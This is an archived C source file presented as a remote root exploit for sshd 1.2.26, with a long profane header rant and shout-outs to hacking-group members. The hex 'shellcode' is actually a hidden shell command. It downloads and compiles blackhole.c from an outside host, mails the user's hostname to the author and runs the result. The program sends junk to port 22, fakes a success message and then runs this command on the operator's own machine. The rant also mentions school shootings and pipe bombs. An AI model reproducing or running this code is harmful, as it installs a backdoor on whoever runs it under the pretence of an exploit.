/* sshd 1.2.26 remote root overflow by ben-z of gH + fts *
* usage: sshdx <box running ssh> [command to exec] *
* ------------------------------------------------------------------- *
* WARNING!: use this at your own risk! (THIS TOOL IS VERY DANGEROUS!) *
* ------------------------------------------------------------------- *
* stuff: *
* this is my going away present to the internet. my mommy took my *
* monitors and keyboards away for failing 4 classes :D and ya know *
* whats even better? tommorows my 16th birthday, and instead of *
* getting shit, im getting shit taken away.. sounds fair doesnt it? *
* this code is dedicated to all the fucking communist idiotic *
* bastards out there that force their kids to go to a place where *
* nothing is learned, for no fucking reason whatsoever. *
* my advice: *
* get a job, learn c, make more money than whoever in charge of you *
* does, and then show them what the fucks up.. its shit like grades *
* that makes ordinary kids want to go into school shooting and *
* throwing pipe bombs. instead of making us memorize every fucking *
* name on the declaration of independence or the periodic table, *
* why not let us actually learn something and use our gift of *
* intelligence to think instead of coughing up shit they stuffed *
* down our throat during the year. im not just going off on the *
* public school system, im going off on every ignorant adult who *
* actually believes that sending their children off to hell from *
* 8-3 is helping them learn how to think. *
* thanks to my friends: *
* ice-e - one of my best friends for almost 4 years *
* now.. hes still learning the ways, but he *
* has the right attitude to go much further *
* than me. *
* folk - my all time favorite scripting buddy. *
* metalman - slacknet.org owns us all! *uNF* *booga* *
* eklipz - sits through my "advanced qbasic" class *
* with me almost every day.. that deserves *
* mad props. *
* Inominate - wrote the reet string->hex converter i use *
* fred - this code is _heavily_ based upon his :) *
* mosthated - i have your docz Eric Witfield (j/k) :D *
* ne0h - gH world domination in progress! *ohyah* *
* rhodie - our former resident 13 year old prodigy *
* c0sm0s1 - found the magic link (you know..) *
* cyrus - ran the ircd that will go down in history *
* magicfx - same as above -- come back! we miss you!#$ *
* chawp - puts the unf back in drunfk :D *
* xela - led me to my first ever copy of mirc.exe *
* joez (dj butta) - youve got a monkey in your shoe. *
* ka0z - everybody gives props to ka0z.. heres mine *
* ka0s - (has nothing to do with ka0z) meep meep *
* madlion - learned drunken nollie hardflips yet? *
* aXion - "This Shit's Got Pop" *
* zeronine - just punch a gaurd in the jaw and make a *
* run for it man.. cops are fat and they *
* make the prisoners work out.. how smart is *
* this? peace yo.. we still lub ya.. *
* aj - basically taught me everything about linux *
* fts(2) - Fuck The System - you guys are my family *
* gH (global hell) - world domination in progress.. we own you. *
* awards: *
* JP - wins for the anti-elite site of the year. *
* ne0h - definatly deserves the "i own every fuckin *
* site on the net with a stupid message and *
* have my own fan club for it" award. :) *
* the FBI - most ignorant lawsuit of the year award. *
* ben-z - wins the "longest intro to code" award :D *
* ------------------------------------------------------------------- */
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char shellcode[] = \
"\x6c\x79\x6e\x78\x20\x2d\x64\x75\x6d\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f" \
"\x73\x6c\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x2f" \
"\x62\x6c\x61\x63\x6b\x68\x6f\x6c\x65\x2e\x63\x20\x3e\x3e\x62\x68\x2e\x63" \
"\x20\x3b\x20\x67\x63\x63\x20\x2d\x6f\x20\x62\x68\x20\x62\x68\x2e\x63\x20" \
"\x3b\x20\x68\x6f\x73\x74\x6e\x61\x6d\x65\x20\x7c\x20\x6d\x61\x69\x6c\x20" \
"\x2d\x73\x20\x22\x6f\x77\x6e\x65\x64\x22\x20\x62\x65\x6e\x7a\x40\x73\x6c" \
"\x61\x63\x6b\x6e\x65\x74\x2e\x6f\x72\x67\x20\x3b\x20\x2e\x2f\x62\x68\x20\x26";
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc < 2) {
printf("%s <target> [cmd (/bin/sh)]\n", argv[0]);
exit(1);
}
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '\0';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such server\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(22);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("overflow succesfull! cmd sent.\n");
else
printf("sorry, this site isn't vulnerable\n");
execl("/bin/sh", "sh", "-c", shellcode, 0);
printf("-eof-\n");
}
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
